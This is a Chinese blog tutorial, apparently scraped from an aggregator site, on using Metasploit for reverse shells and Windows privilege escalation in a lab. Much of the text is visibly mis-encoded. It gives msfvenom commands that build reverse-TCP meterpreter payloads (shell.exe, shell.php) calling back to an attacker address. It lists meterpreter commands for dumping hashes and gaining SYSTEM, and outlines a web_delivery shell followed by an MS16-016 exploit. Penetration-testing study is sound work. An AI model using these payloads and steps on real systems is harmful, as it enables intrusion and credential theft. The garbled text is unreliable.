提权学习之旅——利用Metasploit提权
Metasploit基礎(chǔ)
0x00:簡(jiǎn)介
Metasploit是一個(gè)漏洞利用框架,簡(jiǎn)稱msf。是一個(gè)免費(fèi)的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對(duì)計(jì)算機(jī)軟件漏洞實(shí)施攻擊,,而且本身附帶數(shù)百個(gè)已知軟件漏洞的專業(yè)級(jí)漏洞攻擊工具。是信息收集、漏洞掃描、權(quán)限提升、內(nèi)網(wǎng)滲透等集成的工具。
msf一般會(huì)有四種接口對(duì)外提供,分別為
- msfconsole
- msfcli
- msfgui
- msfweb
0x01:模塊
- exploit
- payload
- auxiliary
- encoder
0x03:基礎(chǔ)命令
search mysql #查找 use exploit/multi/handler #使用 info #查看信息 show exploits/payloads/options #顯示可用信息 exploit/run #執(zhí)行 exploit -j #后臺(tái)運(yùn)行 back #返回上一級(jí) sessions -i #查看當(dāng)前可用會(huì)話 sessions -K #殺死所有活躍會(huì)話 getuid #獲得運(yùn)行Meterpreter會(huì)話的用戶名,從而查看當(dāng)前會(huì)話具有的權(quán)限 sysinfo #列出受控主機(jī)的系統(tǒng)信息 getprivs #盡可能多地獲取目標(biāo)主機(jī)上的特權(quán) getsystem #通過各種攻擊向量來提升到系統(tǒng)用戶權(quán)限 hashdump #導(dǎo)出目標(biāo)主機(jī)中的口令哈希值 screenshot #對(duì)目標(biāo)主機(jī)的屏幕進(jìn)行截圖 background #將當(dāng)前Meterpreter shell轉(zhuǎn)為后臺(tái)運(yùn)行 quit #關(guān)閉當(dāng)前Meterpreter會(huì)話,返回MSF終端 ps #顯示所有運(yùn)行進(jìn)程以及關(guān)聯(lián)的用戶賬戶 migrate PID #遷移到一個(gè)指定的進(jìn)程PID execute -f cmd.exe -i# 執(zhí)行從cmd.exe命令進(jìn)行交互 shell #以所有可用令牌來運(yùn)行一個(gè)交互的shell生成exe程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe生成php程序
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php反彈shell
exploit/multi/hander將剛才生成的shy.php上傳至另外一臺(tái)主機(jī)的Web目錄,進(jìn)行訪問
發(fā)現(xiàn)一個(gè)session已經(jīng)傳過來了
這便是一個(gè)簡(jiǎn)單的反彈shell的操作,如果要連接上只需執(zhí)行如下命令即可
使用background命令使其回到后臺(tái)運(yùn)行
但是感覺連接的不是太穩(wěn)定,容易出現(xiàn)超時(shí)狀態(tài)。
先使用web_delivery
use exploit/multi/script/web_delivery其次查看下信息
這里將targets設(shè)置為2,然后查找相應(yīng)的payload進(jìn)行設(shè)置
設(shè)置好之后,設(shè)置需要的參數(shù)
運(yùn)行將下面的payload拿到目標(biāo)機(jī)器中執(zhí)行,反彈成功
這個(gè)方法相較于上一個(gè)穩(wěn)定一點(diǎn),這里就截一下目標(biāo)機(jī)器的圖片,測(cè)試一下
測(cè)試成功。
利用Metasploit提權(quán)
0x00:MS16-016漏洞簡(jiǎn)介
MS16-016(WebDAV特權(quán)提升漏洞),Microsoft Web分布式創(chuàng)作和版本管理(WebDAV)客戶端驗(yàn)證輸入不當(dāng),就會(huì)存在特權(quán)提升漏洞,成功利用此漏洞可以使用提升的特權(quán)執(zhí)行任意代碼
漏洞影響:
Windows Vista SP2 Windows Server 2008 x86 & x64 Windows Server 2008 R2 x64 Windows 7 x86 & x64 Windows 8.1 x86 & x64環(huán)境準(zhǔn)備:
win7 192.168.186.131 kail 192.168.186.134還是先使用web_delivery進(jìn)行反彈shell
連接成功,查看當(dāng)前用戶
接下來利用powershell遠(yuǎn)程下載Sherlock腳本并進(jìn)行檢測(cè)
發(fā)現(xiàn)存在MS16-016漏洞,直接使用msf搜索看是否有這個(gè)漏洞的exp
使用一下,選擇一下session
進(jìn)行攻擊,即可提權(quán)到system
總結(jié)
這次的學(xué)習(xí)簡(jiǎn)單的了解了Metasploit,以及相應(yīng)的提權(quán)操作,繼續(xù)學(xué)習(xí),沖沖沖!
總結(jié)
以上是生活随笔為你收集整理的提权学习之旅——利用Metasploit提权的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTF训练计划—[CISCN2019]E
- 下一篇: 第四届“强网杯”全国网络安全挑战赛_部分